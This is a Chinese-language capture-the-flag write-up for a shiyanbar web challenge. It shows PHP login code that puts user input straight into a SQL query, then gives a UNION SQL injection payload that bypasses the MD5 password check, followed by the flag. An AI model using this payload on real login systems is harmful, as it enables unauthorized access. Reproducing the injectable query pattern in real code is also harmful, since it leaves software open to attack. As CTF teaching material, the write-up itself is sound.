题目
查看源码
http://ctf5.shiyanbar.com/web/5/index.txt
代码如下
<html> <head> welcome to simplexue </head> <body> <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die("Could not select database"); if ($conn->connect_error) { die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]); $sql = "select pw from php where user='$user'"; $query = mysql_query($sql); if (!$query) { printf("Error: %s ", mysql_error($conn)); exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pw"]; if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) { echo "<p>Logged in! Key:************** </p>"; } else { echo("<p>Log in failure!</p>"); } } ?> <form method=post action=index.php> <input type=text name=user value="Username"> <input type=password name=pass value="Password"> <input type=submit> </form> </body> <a href="index.txt"> </html>
用POST提交user,查询pw
要是pw的值跟md5函数加密过的提交的pass一致
我们可以构造payload
Username : 1' union select "098f6bcd4621d373cade4e832627b4f6" #
Password: test
098f6bcd4621d373cade4e832627b4f6 是test 的md5加密值
SimCTF{youhaocongming}
strcasecmp() 比较两个字符串(不区分大小写)
mysql_fetch_array(result,resulttype)从结果集中取得一行作为数字数组或关联数组
resulttype有以下参数
-
MYSQLI_ASSOC 关联数组
-
MYSQLI_NUM 数字数组
-
MYSQLI_BOTH 都返回